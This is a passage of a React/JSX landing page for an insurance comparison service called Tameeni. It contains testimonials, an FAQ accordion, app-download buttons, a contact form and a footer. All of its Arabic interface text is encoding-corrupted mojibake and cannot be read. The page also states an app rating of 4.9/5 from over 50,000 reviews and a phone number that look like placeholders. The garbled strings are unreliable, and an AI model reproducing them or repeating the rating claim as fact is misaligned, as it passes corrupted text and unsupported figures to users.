            <p className="text-base lg:text-xl text-gray-600 max-w-3xl mx-auto">ุชุฌุงุฑุจ ุญููููุฉ ูู ุนููุงุฆูุง ุงููุฑุงู</p>
          </div>

          <div className="grid sm:grid-cols-2 lg:grid-cols-3 gap-6 lg:gap-8">
            {testimonials.map((testimonial, index) => (
              <Card key={index} className="border-0 shadow-lg hover:shadow-xl transition-all duration-300">
                <CardContent className="p-6 lg:p-8">
                  <div className="flex items-center gap-1 mb-4">
                    {[...Array(testimonial.rating)].map((_, i) => (
                      <Star key={i} className="w-4 h-4 lg:w-5 lg:h-5 fill-yellow-400 text-yellow-400" />
                    ))}
                  </div>
                  <p className="text-sm lg:text-base text-gray-600 mb-6 leading-relaxed">"{testimonial.content}"</p>
                  <div className="flex items-center gap-3">
                    <img
                      src={testimonial.image || "/placeholder.svg"}
                      alt={testimonial.name}
                      width={48}
                      height={48}
                      className="rounded-full"
                    />
                    <div>
                      <h4 className="font-semibold text-gray-900 text-sm lg:text-base">{testimonial.name}</h4>
                      <p className="text-xs lg:text-sm text-gray-600">{testimonial.role}</p>
                    </div>
                  </div>
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* FAQ Section */}
      <section className="py-12 lg:py-20 bg-gray-50">
        <div className="max-w-4xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12 lg:mb-16">
            <Badge className="bg-indigo-100 text-indigo-700 mb-4 px-3 lg:px-4 py-2 text-xs lg:text-sm">
              โ ุฃุณุฆูุฉ ุดุงุฆุนุฉ
            </Badge>
            <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900 mb-4 lg:mb-6">
              ุงูุฃุณุฆูุฉ ุงูุฃูุซุฑ ุดููุนุงู
            </h2>
            <p className="text-base lg:text-xl text-gray-600">ุฅุฌุงุจุงุช ุนูู ุงูุฃุณุฆูุฉ ุงูุชู ูุทุฑุญูุง ุนููุงุคูุง ุจูุซุฑุฉ</p>
          </div>

          <div className="space-y-4">
            {faqs.map((faq, index) => (
              <Card key={index} className="border border-gray-200 hover:shadow-lg transition-all duration-300">
                <CardContent className="p-0">
                  <button
                    className="w-full p-4 lg:p-6 text-right flex items-center justify-between hover:bg-gray-50 transition-colors"
                    onClick={() => setOpenFaq(openFaq === index ? null : index)}
                  >
                    <h3 className="font-semibold text-gray-900 text-sm lg:text-base">{faq.question}</h3>
                    {openFaq === index ? (
                      <ChevronUp className="w-5 h-5 text-gray-500 flex-shrink-0" />
                    ) : (
                      <ChevronDown className="w-5 h-5 text-gray-500 flex-shrink-0" />
                    )}
                  </button>
                  {openFaq === index && (
                    <div className="px-4 lg:px-6 pb-4 lg:pb-6">
                      <p className="text-sm lg:text-base text-gray-600 leading-relaxed">{faq.answer}</p>
                    </div>
                  )}
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* App Download Section */}
      <section className="py-12 lg:py-20 bg-gradient-to-r from-blue-600 via-[#109cd4]  to-indigo-700 text-white relative overflow-hidden">
        <div className="max-w-7xl mx-auto px-4 lg:px-6 relative">
          <div className="grid lg:grid-cols-2 gap-8 lg:gap-12 items-center">
            <div className="space-y-6 lg:space-y-8 text-center lg:text-right">
              <div className="space-y-4">
                <Badge className="bg-white bg-opacity-20 text-white border-white border-opacity-30 px-3 lg:px-4 py-2 text-xs lg:text-sm">
                  ๐ฑ ุชุทุจูู ูุชุทูุฑ
                </Badge>
                <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold">
                  ุญูู ุชุทุจูู ุชุฃูููู
                  <br />
                  ูุงุณุชูุชุน ุจุชุฌุฑุจุฉ ูุฑูุฏุฉ
                </h2>
                <p className="text-base lg:text-xl text-blue-100 leading-relaxed">
                  ุชุทุจูู ุฐูู ูููุฑ ูู ุฌููุน ุฎุฏูุงุช ุงูุชุฃููู ูู ููุงู ูุงุญุฏ. ููุงุฑูุฉ ุณุฑูุนุฉุ ุนุฑูุถ ุญุตุฑูุฉุ ููุชุงุจุนุฉ ูุณุชูุฑุฉ ููุซุงุฆูู.
                </p>
              </div>

              <div className="space-y-3 lg:space-y-4">
                <div className="flex items-center gap-3 justify-center lg:justify-start">
                  <CheckCircle className="w-5 h-5 lg:w-6 lg:h-6 text-green-300 flex-shrink-0" />
                  <span className="text-sm lg:text-lg">ููุงุฑูุฉ ููุฑูุฉ ุจูู ุฌููุน ุงูุดุฑูุงุช</span>
                </div>
                <div className="flex items-center gap-3 justify-center lg:justify-start">
                  <CheckCircle className="w-5 h-5 lg:w-6 lg:h-6 text-green-300 flex-shrink-0" />
                  <span className="text-sm lg:text-lg">ุฅุดุนุงุฑุงุช ุฐููุฉ ูุชุฌุฏูุฏ ุงูุชุฃููู</span>
                </div>
                <div className="flex items-center gap-3 justify-center lg:justify-start">
                  <CheckCircle className="w-5 h-5 lg:w-6 lg:h-6 text-green-300 flex-shrink-0" />
                  <span className="text-sm lg:text-lg">ุฏุนู ุนููุงุก ูุจุงุดุฑ ุนุจุฑ ุงูุชุทุจูู</span>
                </div>
              </div>

              <div className="flex flex-col sm:flex-row gap-3 lg:gap-4 justify-center lg:justify-start">
                <Button size="lg" className="bg-black hover:bg-gray-800 text-white px-4 lg:px-6 py-3">
                  <Download className="w-4 h-4 lg:w-5 lg:h-5 ml-2" />
                  App Store
                </Button>
                <Button size="lg" className="bg-black hover:bg-gray-800 text-white px-4 lg:px-6 py-3">
                  <Download className="w-4 h-4 lg:w-5 lg:h-5 ml-2" />
                  Google Play
                </Button>
              </div>
            </div>

            <div className="relative order-first lg:order-last">
              <div className="relative bg-white bg-opacity-10 backdrop-blur-lg rounded-2xl lg:rounded-3xl p-6 lg:p-8 border border-white border-opacity-20">
                <div className="grid grid-cols-2 gap-3 lg:gap-4">
                  <div className="bg-white rounded-xl lg:rounded-2xl p-3 lg:p-4 shadow-xl">
                    <Smartphone className="w-6 h-6 lg:w-8 lg:h-8 text-blue-600 mb-2" />
                    <p className="text-xs lg:text-sm font-semibold text-gray-900">ุชุทุจูู iOS</p>
                  </div>
                  <div className="bg-white rounded-xl lg:rounded-2xl p-3 lg:p-4 shadow-xl">
                    <Smartphone className="w-6 h-6 lg:w-8 lg:h-8 text-green-600 mb-2" />
                    <p className="text-xs lg:text-sm font-semibold text-gray-900">ุชุทุจูู Android</p>
                  </div>
                </div>
                <div className="mt-4 lg:mt-6 bg-white rounded-xl lg:rounded-2xl p-4 lg:p-6 shadow-xl">
                  <div className="flex items-center justify-between mb-3 lg:mb-4">
                    <span className="text-xs lg:text-sm font-semibold text-gray-900">ุชูููู ุงูุชุทุจูู</span>
                    <div className="flex items-center gap-1">
                      {[1, 2, 3, 4, 5].map((i) => (
                        <Star key={i} className="w-3 h-3 lg:w-4 lg:h-4 fill-yellow-400 text-yellow-400" />
                      ))}
                    </div>
                  </div>
                  <p className="text-lg lg:text-2xl font-bold text-gray-900">4.9/5</p>
                  <p className="text-xs lg:text-sm text-gray-600">ูู ุฃูุซุฑ ูู 50,000 ุชูููู</p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Contact Section */}
      <section id="contact" className="py-12 lg:py-20 bg-white">
        <div className="max-w-7xl mx-auto px-4 lg:px-6">
          <div className="grid lg:grid-cols-2 gap-8 lg:gap-12">
            <div className="space-y-6 lg:space-y-8">
              <div>
                <Badge className="bg-green-100 text-green-700 mb-4 px-3 lg:px-4 py-2 text-xs lg:text-sm">
                  ๐ ุชูุงุตู ูุนูุง
                </Badge>
                <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900 mb-4 lg:mb-6">
                  ูู ูุฏูู ุงุณุชูุณุงุฑุ ูุญู ููุง ููุณุงุนุฏุชู
                </h2>
                <p className="text-base lg:text-xl text-gray-600">
                  ูุฑูู ุฏุนู ุงูุนููุงุก ูุชุงุญ ุนูู ูุฏุงุฑ ุงูุณุงุนุฉ ููุฅุฌุงุจุฉ ุนูู ุฌููุน ุงุณุชูุณุงุฑุงุชู
                </p>
              </div>

              <div className="space-y-4 lg:space-y-6">
                <div className="flex items-center gap-4">
                  <div className="w-12 h-12 lg:w-16 lg:h-16 bg-blue-100 rounded-xl lg:rounded-2xl flex items-center justify-center">
                    <Phone className="w-6 h-6 lg:w-8 lg:h-8 text-blue-600" />
                  </div>
                  <div>
                    <h3 className="font-semibold text-gray-900 text-sm lg:text-base">ุงุชุตู ุจูุง</h3>
                    <p className="text-sm lg:text-base text-gray-600">920000000</p>
                  </div>
                </div>

                <div className="flex items-center gap-4">
                  <div className="w-12 h-12 lg:w-16 lg:h-16 bg-green-100 rounded-xl lg:rounded-2xl flex items-center justify-center">
                    <Mail className="w-6 h-6 lg:w-8 lg:h-8 text-green-600" />
                  </div>
                  <div>
                    <h3 className="font-semibold text-gray-900 text-sm lg:text-base">ุฑุงุณููุง</h3>
                    <p className="text-sm lg:text-base text-gray-600">info@tameeni.com</p>
                  </div>
                </div>

                <div className="flex items-center gap-4">
                  <div className="w-12 h-12 lg:w-16 lg:h-16 bg-purple-100 rounded-xl lg:rounded-2xl flex items-center justify-center">
                    <MessageCircle className="w-6 h-6 lg:w-8 lg:h-8 text-purple-600" />
                  </div>
                  <div>
                    <h3 className="font-semibold text-gray-900 text-sm lg:text-base">ุฏุฑุฏุดุฉ ูุจุงุดุฑุฉ</h3>
                    <p className="text-sm lg:text-base text-gray-600">ูุชุงุญ 24/7</p>
                  </div>
                </div>
              </div>
            </div>

            <Card className="border-0 shadow-xl">
              <CardContent className="p-6 lg:p-8">
                <h3 className="text-xl lg:text-2xl font-bold text-gray-900 mb-6">ุฃุฑุณู ููุง ุฑุณุงูุฉ</h3>
                <div className="space-y-4">
                  <div className="grid sm:grid-cols-2 gap-4">
                    <Input placeholder="ุงูุงุณู ุงูุฃูู" />
                    <Input placeholder="ุงูุงุณู ุงูุฃุฎูุฑ" />
                  </div>
                  <Input placeholder="ุงูุจุฑูุฏ ุงูุฅููุชุฑููู" type="email" />
                  <Input placeholder="ุฑูู ุงููุงุชู" type="tel" />
                  <Textarea placeholder="ุฑุณุงูุชู" rows={4} />
                  <Button className="w-full bg-gradient-to-r from-blue-600 to-[#109cd4]  hover:from-[#109cd4]  hover:to-[#109cd4] ">
                    <ArrowRight className="w-4 h-4 lg:w-5 lg:h-5 ml-2" />
                    ุฅุฑุณุงู ุงูุฑุณุงูุฉ
                  </Button>
                </div>
              </CardContent>
            </Card>
          </div>
        </div>
      </section>

      {/* Final CTA Section */}
      <section className="py-12 lg:py-20 bg-gradient-to-r from-blue-50 to-indigo-50">
        <div className="max-w-4xl mx-auto px-4 lg:px-6 text-center">
          <div className="space-y-6 lg:space-y-8">
            <div className="space-y-4">
              <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900">
                ุฌุงูุฒ ููุญุตูู ุนูู ุฃูุถู ุนุฑุถ ุชุฃูููุ
              </h2>
              <p className="text-base lg:text-xl text-gray-600">ุงุจุฏุฃ ุงูุขู ูุงุญุตู ุนูู ุนุฑุถ ุณุนุฑ ูุฎุตุต ูู ุฃูู ูู ุฏูููุชูู</p>
            </div>

            <Button
              size="lg"
              className="bg-gradient-to-r from-blue-600 to-[#109cd4]  hover:from-[#109cd4]  hover:to-[#109cd4]  shadow-xl hover:shadow-2xl transition-all duration-300 px-8 lg:px-12 py-4 text-base lg:text-lg"
            >
              <Zap className="w-5 h-5 lg:w-6 lg:h-6 ml-2" />
              ุงุจุฏุฃ ุงูููุงุฑูุฉ ุงูุขู - ูุฌุงูุงู
            </Button>
          </div>
        </div>
      </section>

      {/* Footer */}
      <footer className="bg-gray-900 text-white">
        <div className="max-w-7xl mx-auto px-4 lg:px-6 py-12 lg:py-16">
          <div className="grid sm:grid-cols-2 lg:grid-cols-4 gap-8 mb-8 lg:mb-12">
            <div className="space-y-4">
              <div className="flex items-center gap-3">
                <img src="/Logo-AR.png" alt="logo" width={120} />

              </div>
              <p className="text-sm lg:text-base text-gray-400 leading-relaxed">
                ููุตุฉ ุงูุชุฃููู ุงูุฑูููุฉ ุงูุฑุงุฆุฏุฉ ูู ุงูุณุนูุฏูุฉ. ููุฏู ุญููู ุชุฃููู ุฐููุฉ ููุจุชูุฑุฉ ูุญูุงูุฉ ูุง ูููู.
              </p>
              <div className="flex gap-3">
                <div className="w-8 h-8 lg:w-10 lg:h-10 bg-gray-800 hover:bg-blue-600 rounded-lg flex items-center justify-center cursor-pointer transition-colors">
                  <Globe className="w-4 h-4 lg:w-5 lg:h-5" />
                </div>
                <div className="w-8 h-8 lg:w-10 lg:h-10 bg-gray-800 hover:bg-blue-600 rounded-lg flex items-center justify-center cursor-pointer transition-colors">
                  <Phone className="w-4 h-4 lg:w-5 lg:h-5" />
                </div>
                <div className="w-8 h-8 lg:w-10 lg:h-10 bg-gray-800 hover:bg-blue-600 rounded-lg flex items-center justify-center cursor-pointer transition-colors">
                  <Mail className="w-4 h-4 lg:w-5 lg:h-5" />
                </div>
              </div>
            </div>

            <div>
              <h3 className="font-bold text-base lg:text-lg mb-4">ุงูุฎุฏูุงุช</h3>
              <ul className="space-y-2 lg:space-y-3 text-sm lg:text-base text-gray-400">
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุชุฃููู ุงูุณูุงุฑุงุช
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุงูุชุฃููู ุงูุตุญู
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุชุฃููู ุงูุณูุฑ
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุชุฃููู ุงูููุงุฒู
                  </a>
                </li>
              </ul>
            </div>

            <div>
              <h3 className="font-bold text-base lg:text-lg mb-4">ุงูุดุฑูุฉ</h3>
              <ul className="space-y-2 lg:space-y-3 text-sm lg:text-base text-gray-400">
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ูู ูุญู
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ูุฑูู ุงูุนูู
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุงููุธุงุฆู
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุงูุฃุฎุจุงุฑ
                  </a>
                </li>
              </ul>
            </div>

            <div>
              <h3 className="font-bold text-base lg:text-lg mb-4">ุงูุฏุนู</h3>
              <ul className="space-y-2 lg:space-y-3 text-sm lg:text-base text-gray-400">
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ูุฑูุฒ ุงููุณุงุนุฏุฉ
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุงุชุตู ุจูุง
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุงูุฃุณุฆูุฉ ุงูุดุงุฆุนุฉ
                  </a>
                </li>
                <li>
                  <a href="#" className="hover:text-white transition-colors">
                    ุณูุงุณุฉ ุงูุฎุตูุตูุฉ
                  </a>
                </li>
              </ul>
            </div>
          </div>

          <div className="border-t border-gray-800 pt-6 lg:pt-8 flex flex-col lg:flex-row justify-between items-center gap-4">
            <p className="text-xs lg:text-sm text-gray-400 text-center lg:text-right">
              ยฉ 2024 ุชุฃูููู. ุฌููุน ุงูุญููู ูุญููุธุฉ. ูุฑุฎุต ูู ุงูุจูู ุงููุฑูุฒู ุงูุณุนูุฏู.
            </p>
            <div className="flex items-center gap-4 lg:gap-6 text-xs lg:text-sm text-gray-400">
              <a href="#" className="hover:text-white transition-colors">
                ุงูุดุฑูุท ูุงูุฃุญูุงู
              </a>
              <a href="#" className="hover:text-white transition-colors">
                ุณูุงุณุฉ ุงูุฎุตูุตูุฉ
              </a>
              <a href="#" className="hover:text-white transition-colors">
                ูููุงุช ุชุนุฑูู ุงูุงุฑุชุจุงุท
              </a>
            </div>
          </div>
        </div>
      </footer>

    </div>
  )
}
